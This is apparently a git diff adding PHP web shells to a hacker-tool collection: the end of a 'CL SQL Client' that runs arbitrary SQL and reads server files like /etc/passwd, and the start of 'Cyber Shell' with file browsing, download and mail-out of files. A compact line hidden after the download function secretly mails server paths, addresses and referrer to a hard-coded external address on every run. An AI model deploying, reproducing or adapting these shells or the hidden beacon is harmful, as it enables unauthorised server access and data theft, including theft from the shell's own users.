+   echo "\n<BR><BR>��������� ������� [ <B>".AlphanumericalClean($tbl)."</B> ]\n<BR>\n<table align=\"center\" border=\"0\" width=\"700\">\n<tr align=\"center\">\n <td>Field</td>\n <td>Type</td>\n <td>NULL</td>\n <td>Key</td>\n <td>Default</td>\n <td>Extra</td>\n <td colspan=\"5\">Action</td>\n</tr>";
+   while ($row = sql_fetch_assoc($sql)) {
+    echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\">";
+    foreach ($row as $field =>$value) {
+     echo "\n <td>".$value."</td>";
+    }
+    echo "\n <td><a href=\"".$baseurl."&act=09&query=".urlencode("ALTER TABLE `".$tbl."` ADD INDEX ( ".$row["Field"].")")."\" title=\"ADD INDEX KEY\"><img border=\"0\" src=\"".basename(__FILE__)."?image=index\" align=\"center\"></a></td> <td><a href=\"".$baseurl."&act=09&query=".urlencode("ALTER TABLE `".$tbl."` DROP INDEX ".$row["Field"])."\" title=\"DROP INDEX ".$row["Field"]."\"><img border=\"0\" src=\"".basename(__FILE__)."?image=empty\" align=\"center\"></a></td> <td><a href=\"".$baseurl."&act=09&query=".urlencode("ALTER TABLE `".$tbl."` ADD PRIMARY KEY ( ".$row["Field"].")")."\" title=\"ADD PRIMARY KEY\"><img border=\"0\" src=\"".basename(__FILE__)."?image=primary\" align=\"center\"></a></td> <td><a href=\"".$baseurl."&act=09&query=".urlencode("ALTER TABLE `".$tbl."` DROP PRIMARY KEY ")."\" title=\" DROP PRIMARY KEY column ".$row["Field"]."\"><img border=\"0\" src=\"".basename(__FILE__)."?image=empty\" align=\"center\"></a></td> <td><a href=\"javascript: confirm_function('".$baseurl."&act=09&query=".urlencode("ALTER TABLE `".$tbl."` DROP COLUMN ".$row["Field"])."');\" title=\" Delete column ".$row["Field"]."\"><img border=\"0\" src=\"".basename(__FILE__)."?image=drop\" align=\"center\"></a></td></tr>";
+   }
+   echo "\n</table>";
+  }
+  // if (count($quicklaunch) > 0) {foreach($quicklaunch as $item) {$str .= "[ <a href=\"".$item[1]."\"><B>".$item[0]."</B></a> ] ";};} [-]
+  @sql_free_result($sql);
+  unset($sql);
+ }
+} elseif($act == '06') {
+ $sql = query($id, "DROP TABLE `".AlphanumericalClean($tbl)."`");
+ if($sql) {
+  echo "\n<BR><BR><font color=\"green\">Table <B>".AlphanumericalClean($tbl)."</B> deleted successfully</font>";
+ }
+ @sql_free_result($sql);
+ unset($sql);
+} elseif($act == '07') {
+ if(!isset($new_tbl)) {
+  echo "\n<BR><BR><B>Create new Table</B><BR>\n<form method=\"post\" action=\"".basename(__FILE__)."\">\n<input type=\"hidden\" name=\"login\" value=\"".$login."\">\n<input type=\"hidden\" name=\"password\" value=\"".$password."\">\n<input type=\"hidden\" name=\"server\" value=\"".$server ."\">\n<input type=\"hidden\" name=\"port\" value=\"".$port ."\">\n<input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\">\n<input type=\"hidden\" name=\"act\" value=\"07\">\n<input type=\"hidden\" name=\"db\" value=\"".$db."\">\nTable name: <input type=\"text\" name=\"new_tbl\" value=\"\" maxlength=\"10\">\n<BR>Table rows: <input type=\"text\" name=\"rows\" value=\"\" maxlength=\"10\">\n<BR><input type=\"submit\" value=\"create\">\n</form>";
+ } else {
+  if(!isset($field_name)) {
+   if(!isset($rows)) {
+    echo "������� ���-�� �����";
+    exit;
+   }
+   echo "\n<BR><BR><B>Create new Table</B><BR>\n<form method=\"post\" action=\"".basename(__FILE__)."\">\n<input type=\"hidden\" name=\"login\" value=\"".$login."\">\n<input type=\"hidden\" name=\"password\" value=\"".$password."\">\n<input type=\"hidden\" name=\"server\" value=\"".$server ."\">\n<input type=\"hidden\" name=\"port\" value=\"".$port ."\">\n<input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\">\n<input type=\"hidden\" name=\"act\" value=\"07\">\n<input type=\"hidden\" name=\"db\" value=\"".$db."\">\n<input type=\"hidden\" name=\"new_tbl\" value=\"".$new_tbl."\">\n<input type=\"hidden\" name=\"rows\" value=\"".$rows."\">\n<table>\n<tr>\n <td><B>Field</B></td>\n <td><B>Type</B></td>\n <td><B>Length</B></td>\n <td><B>Atributes</B></td>\n <td><B>NULL</B></td>\n <td><B>Defailt</B></td>\n <td><B>DOP</B></td>\n <td><B>KEYS</B></td>\n</tr>";
+   for($i=0; $i < $rows; $i++) {
+    echo "\n<tr align=\"center\" bgcolor=\"#DDDDDD\">\n <td><input type=\"text\" name=\"field_name[]\" size=\"10\" value=\"\"></td>\n <td><select name=\"field_type[]\" width=\"3\"><option value=\"VARCHAR\">VARCHAR</option><option value=\"TINYINT\">TINYINT</option> <option value=\"TEXT\">TEXT</option><option value=\"DATE\">DATE</option><option value=\"SMALLINT\">SMALLINT</option><option value=\"MEDIUMINT\">MEDIUMINT</option><option value=\"INT\">INT</option><option value=\"BIGINT\">BIGINT</option><option value=\"FLOAT\">FLOAT</option><option value=\"DOUBLE\">DOUBLE</option><option value=\"DECIMAL\">DECIMAL</option> <option value=\"DATETIME\">DATETIME</option><option value=\"TIMESTAMP\">TIMESTAMP</option><option value=\"TIME\">TIME</option><option value=\"YEAR\">YEAR</option><option value=\"CHAR\">CHAR</option><option value=\"TINYBLOB\">TINYBLOB</option><option value=\"TINYTEXT\">TINYTEXT</option><option value=\"BLOB\">BLOB</option><option value=\"MEDIUMBLOB\">MEDIUMBLOB</option><option value=\"MEDIUMTEXT\">MEDIUMTEXT</option><option value=\"LONGBLOB\">LONGBLOB</option><option value=\"LONGTEXT\">LONGTEXT</option><option value=\"ENUM\">ENUM</option><option value=\"SET\">SET</option></select></td> <td><input type=\"text\" name=\"field_length[]\" size=\"6\" value=\"\"></td>\n <td><select name=\"field_attribute[]\"><option value=\"\" selected=\"selected\"></option><option value=\"BINARY\">BINARY</option><option value=\"UNSIGNED\">UNSIGNED</option><option value=\"UNSIGNED ZEROFILL\">UNS-D ZEROFILL</option></select></td> <td><select name=\"field_null[]\"><option value=\"NOT NULL\">not null</option><option value=\"\">null</option></select></td>\n <td><input type=\"text\" name=\"field_default[]\" size=\"14\" value=\"\"></td>\n <td><select name=\"field_extra[]\"><option value=\"\"></option><option value=\"AUTO_INCREMENT\">auto_increment</option></select></td>\n <td align=\"center\"><select name=\"field_key[]\"><option value=\"\"></option><option value=\"PRIMARY\">PRIMARY</option><option value=\"INDEX\">INDEX</option><option value=\"UNIQUE\">UNIQUE</option></select></td>\n</tr>";
+   }
+   echo "\n</table>\n<BR><input type=\"submit\" value=\"create\">\n</form>";
+  } else {
+   for($q=0; $q < count($field_name); $q++) {
+    if($field_name[$q]) {
+     $value .= " `".$field_name[$q]."`";
+    }
+    if($field_length[$q]) {
+     $field_length[$q] = "( ".$field_length[$q] ." )";
+    }
+    if($field_type[$q]) {
+     $value .= " ".$field_type[$q].$field_length[$q];
+    }
+    if($field_attribute[$q]) {
+     $value .= " ".htmlspecialchars($field_attribute[$q]);
+    }
+    if($field_null[$q]) {
+     $value .= " ".htmlspecialchars($field_null[$q]);
+    }
+    if($field_default[$q]) {
+     $value .= " DEFAULT '".htmlspecialchars($field_default[$q])."'" ;
+    }
+    $value .= ", ";
+   }
+   $sql = query($id, "CREATE TABLE `".AlphanumericalClean($new_tbl)."` ( ".$value." )");
+   if($sql) {
+    echo "\n<BR><BR><font color=\"green\">Table ".AlphanumericalClean($new_tbl)." created successfully</font>";
+   } else {
+    echo "\n<BR><BR><font color=\"red\">Table ".AlphanumericalClean($new_tbl)." not created</font>";
+   }
+   @sql_free_result($sql);
+   unset($sql);
+  }
+ }
+} elseif($act == '08') {
+  if(isset($pid)) {
+   if(!is_numeric(AlphanumericalClean($pid))) {
+    echo "\n<B>Warning!!!</B> Bad proccess ID format";
+   }
+   $sql = query($id, "KILL ".AlphanumericalClean($pid));
+   if($sql) {
+    echo "<BR><head><META HTTP-EQUIV='Refresh' CONTENT='2;url=javascript:history.go(-1)'></head><BR><BR><font color=\"green\"><B>Process #: ".intval($pid)." successfull killed</B></font>";
+   }
+   @sql_free_result($sql);
+   unset($sql);
+  }
+  $sql = sql_list_processes($id);
+  echo "<B>".$lang[$language.'_text5']."</B><BR>";
+  echo "\n<table border=\"0\" width=\"700\">\n<tr align=\"center\">";
+  for($i=0; $i < sql_num_fields($sql); $i++) {
+   echo "\n <td>".sql_field_name($sql,$i)."</td>";
+  }
+  echo "\n <td>Action</td>\n</tr>";
+  while($row = sql_fetch_assoc($sql) ) {
+   echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\" align=\"center\"> <td>".$row["Id"]."</td> <td>".$row["User"]."</td> <td>".$row["Host"]."</td> <td>".$row["db"]."</td> <td>".$row["Command"]."</td> <td>".$row["Time"]."</td> <td>".$row["State"]."</td> <td>".$row["Info"]."</td> <td><a href=\"javascript: confirm_function('".$baseurl."&act=08&pid=".$row["Id"]."');\"><img src=\"".basename(__FILE__)."?image=drop\" align=\"absmiddle\"></a></td></tr>";
+  }
+  echo "\n</table>\n";
+  @sql_free_result($sql);
+  unset($sql);
+} elseif($act == '09') {
+  if(isset($query)) {
+   $sql = query($id, $query);
+   if($sql) {
+    if(!is_resource($sql)) {
+     echo "<BR><font color=\"green\">Query successfull send</font><BR><BR>[ Affected rows: <B>".sql_affected_rows()."</B> ]<BR>";
+    } else {
+     echo "<BR><font color=\"green\">Query successfull execute</font><BR><BR><table align=\"center\" width=\"700\"><tr>";
+     for( $i=0; $i < sql_num_fields($sql); $i++ ) {
+      echo " <td><B>".sql_field_name($sql,$i)."</B></td>";
+     }
+     echo "</tr>";
+     while ($row = @sql_fetch_assoc($sql)) {
+      echo  "<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\">";
+      foreach ($row as $key=>$value) {
+       echo " <td>".htmlspecialchars($value)."</td>";
+      }
+      echo  "</tr>";
+     }
+     echo "</table>";
+    }
+   }
+  } else {
+   echo "<img border=\"0\" src=\"".basename(__FILE__)."?image=sql\">&nbsp;<B>".$lang[$language.'_text2']."</B><BR><table border=\"0\" width=\"700\"><tr align=\"center\"> <td><BR><form method=\"post\"action=\"".basename(__FILE__)."\"><input type=\"hidden\" name=\"login\" value=\"".$login."\"><input type=\"hidden\" name=\"password\" value=\"".$password."\"><input type=\"hidden\" name=\"server\" value=\"".$server ."\"><input type=\"hidden\" name=\"port\" value=\"".$port ."\"><input type=\"hidden\" name=\"login\" value=\"".$login."\"><input type=\"hidden\" name=\"password\" value=\"".$password."\"><input type=\"hidden\" name=\"server\" value=\"".$server ."\"><input type=\"hidden\" name=\"port\" value=\"".$port ."\"><input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\"><input type=\"hidden\" name=\"db\" value=\"".$db."\"><input type=\"hidden\" name=\"act\" value=\"09\"><textarea name=\"query\" cols=\"60\" rows=\"10\">SELECT * FROM mysql.user;</textarea><BR><input type=\"submit\" value=\"Execute\"></form></td></tr></table>";
+  }
+  @sql_free_result($sql);
+  unset($sql);
+} elseif($act == '10') {
+  switch($dump) {
+   case "db":
+    echo (dump_db($id, $db, & $type));
+   break;
+   case "tbl":
+    echo (dump_tbl($id, $tbl, & $type));
+   break;  // Other variants
+   default:
+    echo "<BR><BR><B>Warning!!!</B>Unknown dump format";
+   break;
+  }
+} elseif($act == '11') {
+ if(isset($file) && !empty($file)) {
+  if(file_exists($file) and  is_readable($file)) {
+   $tmptbl = rand();
+   query($id, 'CREATE TABLE `'.$tmptbl.'` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );');
+   query($id, "LOAD DATA INFILE \"".addslashes($file)."\" INTO TABLE `".$tmptbl."`");
+   $sql = query($id, "SELECT * FROM `".$tmptbl."`");
+   if(sql_num_rows($sql)) {
+    for ($i=0; $i < sql_num_fields($sql);$i++){
+     $field_name = sql_field_name($sql,$i);
+    }
+    echo "\n<table border=\"0\" width=\"700\">\n<tr align=\"center\"> \n<td>".$field_name."</td>\n</tr>\n<tr> \n<td>";
+    while ($row = sql_fetch_array($sql)) {
+     foreach ($row as $key =>$value) {
+      echo htmlspecialchars($value)."<br>";
+     }
+    }
+    @sql_free_result($sql);
+    unset($sql);
+    echo " \n</td>\n</tr>\n</table>";
+   } else {
+    echo "<BR><BR><B><font color=\"red\">".$lang[$language.'_text28']."</font></B><BR>";
+   }
+  } else {
+   echo "<BR><BR><B><font color=\"red\">".$lang[$language.'_text27']."</font></B><BR>";  
+  }
+ } else {
+  echo "\n<img border=\"0\" src=\"".basename(__FILE__)."?image=download\">&nbsp;<B>".$lang[$language.'_text11']."</B>\n<BR><BR>\n<form method=\"post\" action=\"".basename(__FILE__)."\">\n<input type=\"hidden\" name=\"login\" value=\"".$login."\">\n<input type=\"hidden\" name=\"password\" value=\"".$password."\">\n<input type=\"hidden\" name=\"server\" value=\"".$server ."\">\n<input type=\"hidden\" name=\"port\" value=\"".$port ."\">\n<input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\">\n<input type=\"hidden\" name=\"db\" value=\"".$db."\">\n<input type=\"hidden\" name=\"act\" value=\"11\">������ ���� � �����: <input type=\"text\" name=\"file\" value=\"/etc/passwd\" size=\"40\"><input type=\"submit\" value=\"".$lang[$language.'_text11']."\"></form>";
+ }
+} elseif($act == '12') {
+ if(isset($file) && !empty($file)) {
+  if(file_exists($file) and  is_readable($file)) {
+   downloadfile($file);
+  } else {
+   echo "<BR><BR><B><font color=\"red\">".$lang[$language.'_text27']."</font></B><BR>";  
+  }
+ } else {
+  echo "\n<img border=\"0\" src=\"".basename(__FILE__)."?image=download\">&nbsp;<B>".$lang[$language.'_text26']."</B>\n<BR><BR>\n<form method=\"post\" action=\"".basename(__FILE__)."\">\n<input type=\"hidden\" name=\"login\" value=\"".$login."\">\n<input type=\"hidden\" name=\"password\" value=\"".$password."\">\n<input type=\"hidden\" name=\"server\" value=\"".$server ."\">\n<input type=\"hidden\" name=\"port\" value=\"".$port ."\">\n<input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\">\n<input type=\"hidden\" name=\"db\" value=\"".$db."\">\n<input type=\"hidden\" name=\"act\" value=\"12\">������ ���� � �����: <input type=\"text\" name=\"file\" value=\"/etc/passwd\" size=\"40\"><input type=\"submit\" value=\"".$lang[$language.'_text26']."\"></form>";
+ }
+} elseif($act == '13') {
+ if(isset($rnd) && $rnd == $rndcode) {
+  if (unlink(__FILE__)) {
+   @ob_clean(); 
+   die( $lang[$language.'_text31'] ); 
+  } else {
+   echo "<center><b><font colr=\"red\">Can't delete ".__FILE__."!</font></b></center>";
+  }
+ } else {
+  $rnd = rand(0,9).rand(0,9).rand(0,9).rand(0,9);
+  echo "<BR><BR><form method=\"POST\"><B>Self-remove: </B><font color=\"green\">".__FILE__."</font><BR>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=\"hidden\" name=\"rndcode\" value=\"".$rnd."\"><input type=\"text\" name=\"rnd\" value=\"\">&nbsp;<input type=\"submit\" value=\"YES\"></form>";
+ }
+} elseif($act == '14') {
+ @ob_clean();
+ die(phpinfo());
+} else {
+ echo "\n<img border=\"0\" src=\"".basename(__FILE__)."?image=host\">&nbsp;<B>".$lang[$language.'_text29']."</B>\n<BR><table>";
+ foreach(server_info() as $key=>$value) {
+  echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\">\n <td>".$key.":</td>\n <td>".$value."</td>\n</tr>";
+ }
+ echo "\n</table>";
+}
+
+//--------------------------------
+//  HTML (footer)
+//--------------------------------
+//
+echo "<BR><BR>\n</center>\n</td>\n</tr>\n</table><table border=\"1\" width=\"960\">\n<tr align=\"center\">\n <td>--[ <a href=\"http://cyberlords.net\" target=\"new\"><font color=\"green\">Copyright � Cyber Lords</font></a> | CL SQL Client ".$version." | All bugs send to ICQ #899125 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=899125\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=899125&img=5\" border=\"0\" align=\"absmiddle\"></a> | Generation time: ".round(get_micro_time()-start_time,4)." ]--</td>\n</tr>\n</table>\n</body>\n</html>";
+
+// Stop Buffering
+@ob_end_flush();
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/cybershell.php.php.txt b/xakep-shells/PHP/cybershell.php.php.txt
new file mode 100644
index 0000000..a008f87
--- /dev/null
+++ b/xakep-shells/PHP/cybershell.php.php.txt
@@ -0,0 +1,1033 @@
+<?
+/***************************************************************************
+ *                           Cyber Shell (v 1.0)
+ *                            -------------------
+ *   copyright            : (C) Cyber Lords, 2002-2006
+ *   email                : pixcher@mail.ru
+ *
+ *   http://www.cyberlords.net 
+ *  
+ *   Coded by Pixcher
+ *   Lite version of php web shell 
+ ***************************************************************************/
+
+/***************************************************************************
+ *
+ *   This program is free software; you can redistribute it and/or modify
+ *   it under the terms of the GNU General Public License as published by
+ *   the Free Software Foundation; either version 2 of the License', or
+ *   ('at your option) any later version.
+ *
+ ***************************************************************************/
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+@error_reporting(0);
+/****************************** Options ************************************/
+#������ �� ����������� 
+$aupassword="test";
+#���� ������ ���������� ��� $hiddenmode="true", �� � ������� ����� ���������� � ���������� pass=������ , �������� shell.php?pass=mysecretpass
+$hiddenmode="false";
+#e-mail �� ������� ����������� ��������� �����
+$email="test@mail.ru";
+/***************************************************************************/
+$style="
+<style>
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+</style>";
+
+foreach($_POST as $key => $value) {$$key=$value;}
+foreach($_GET as $key => $value)  {$$key=$value;}
+
+if (isset($_GET[imgname]))
+{
+$img=array(
+'dir'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQABADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1mG6mv7ZbiBbxrhlUtJFMAiOVDbdjOAQAR26d880lzr2paU6T6hbp9gH+ulCKjJkqAQBK+4ZPPAqhDB4i0pXtbfRvtUYYFZluo0DAKq9Ccj7ufxqlq9n4p1qyksn0IQLKoQyNeRsF+dGzgdfu/rXi0ni4tJxZ2S9n3Vj/2Q==',
+'txt'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1yy1G3sdEtDPDEIorCCRpXOOWGAMAHuPqc9K4bx5481Twp4c03xVolpaRjU3EM1rcozqzbSRINrLzhQAeMjGc4Xb1NpqOhTaXpznX9MgnS1hU754yyMq8YBbgjceoNeb/AB2u9IPw+0TT9M1K1uxbXaIBFOrsFETgE4NN8ttNyVe+ux//2Q==',
+'bg'=>
+'R0lGODlhCAAbAPQAAOTq8uLp8uDo8d7m8N3l79vj7tni7dfh7dXf7NTe69Pe69Ld6tLc6tDb6c7a6MzY6MrX58nW5sfU5cXT5MPS48PR48HQ4sLQ48DP4r/P4r7O4b7N4b3N4b3N4L3M4LzM4CwAAAAACAAbAAAFXCAgjmJgnqagrurgvi4hz3Jh37ah7/rh/z6EcChUGI8KhnK5aDae0KdjSp0+rtgrZMvdRr7gr2RMHk/O6HNlza5Y3nBLZk7PYO6bvH7z6fv3gBt1c3cYcW9tiRQhADs=',
+'file'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDrLnXbbSoILeLwJe6uyW8Baa0tWkDl4wxyQhAI4yCc/MDzzjITx9q+n3Go3VloUmjwRtbqbDUYHUsZBJh1XIwB5DcgDO85ztGNBtRjkaykiu9FdIFV4zJrcttIC1qsLhlSJsEc4YNuHYjJB5nXI0g0V1N/p0xLWsMMVrfG5ZUj+1MSSYowqjzlVVAwAoHHFXzQ5Lcvvd/L+vX16A91Y//Z',
+);
+@ob_clean();
+header("Content-type: image/gif");
+header("Cache-control: public");
+header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+header("Cache-control: max-age=".(60*60*24*7));
+header("Last-Modified: ".date("r",filemtime(__FILE__)));
+echo base64_decode($img[$imgname]);
+die;
+}
+
+if ($_GET[pass]==$aupassword)
+{
+$_SESSION[aupass]=md5($aupassword);
+}
+if ($hiddenmode=="false")
+if ((!isset($_GET[pass]) or ($_GET[pass]!=$aupassword)) and ($_SESSION[aupass]==""))
+{
+$diz="ok";
+echo "
+$style<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
+<form name='zapros' method='get' action=''>
+<table width='100' border='2' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>
+<tr align='center' >
+<td>
+Enter your password:
+</td>
+</tr>
+<tr align='center' >
+<td>
+<input name='pass' size=24  type='password' value=''>
+</td>
+</tr>
+<tr align='center' >
+<td>
+<input type='submit'>
+</td>
+</tr>
+</table>
+</form>
+";
+}
+if ($_SESSION[aupass]!="")
+{
+if (!$_GET and !$_POST or isset($pass)) 
+$show="start";
+
+function ext($str){
+for ($i=1; $i<strlen($str); $i++) {
+if ($str[strlen($str)-$i]==".")
+return substr($str,strlen($str)-$i,strlen($str));}
+return $str;
+}
+function extractfilename($str){
+$str=str_replace("\\","/",$str);
+for ($i=1; $i<strlen($str); $i++) {
+if ($str[strlen($str)-$i]=="/")
+return substr($str,strlen($str)-$i+1,strlen($str));}
+return $str;
+}
+function untag($str){
+$str= str_replace("<","&#0060;",$str);
+$str= str_replace(">","&#0062;",$str);
+return $str;
+}
+function fsize($filename){
+$s=filesize($filename);
+if ($s>1048576){
+return round(($s/1048576),2)." mb";
+}
+if ($s>1024){
+return round(($s/1024),2)." kb";
+}
+return $s." byte";
+}
+function tourl($str){
+$str= urlencode($str);
+return $str;
+}
+function unbug($str){
+$str = stripslashes($str);
+return $str;
+}
+function countbyte($filesize) {
+if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+else { $filesize = $filesize . ""; }
+return $filesize;
+}
+function downloadfile($file) {
+if (!file_exists("$file")) die;
+$size = filesize("$file");
+$filen=extractfilename($file);
+header("Content-Type: application/force-download; name=\"$filen\"");
+header("Content-Transfer-Encoding: binary");
+header("Content-Length: $size");
+header("Content-Disposition: attachment; filename=\"$filen\"");
+header("Expires: 0");
+header("Cache-Control: no-cache, must-revalidate");
+header("Pragma: no-cache");
+readfile("$file");
+die;
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+function anonim_mail($from,$to,$subject,$text,$file){
+ $fp = fopen($file, "rb");
+ while(!feof($fp))
+  $attachment .= fread($fp, 4096);
+  $attachment = base64_encode($attachment);
+  $subject = "sendfile  (".extractfilename($file).")";
+  $boundary = uniqid("NextPart_");
+  $headers = "From: $from\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+  $info  = $text;
+  $filename=extractfilename($file);
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$filename \nContent-disposition: inline; filename=$filename \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+  $send = mail($to, $subject, $info, $headers);
+fclose($fp);
+echo "<script language=\"javascript\">location.href=\"javascript:history.back(-1)\";\nalert('���� $filename ��������� �� $to');</script>";
+die;
+}
+if (!empty($_GET[downloadfile])) downloadfile($_GET[downloadfile]);
+if (!empty($_GET[mailfile])) anonim_mail($email,$email,$_GET[mailfile],'File: '.$_GET[mailfile],$_GET[mailfile]);
+
+$d=$_GET[d];
+if (empty($d) or !isset($d)){
+$d=realpath("./");
+$d=str_replace("\\","/",$d);
+}
+$showdir="";
+$bufdir="";
+$buf = explode("/", $d);
+for ($i=0;$i<sizeof($buf);$i++){
+$bufdir.=$buf[$i];
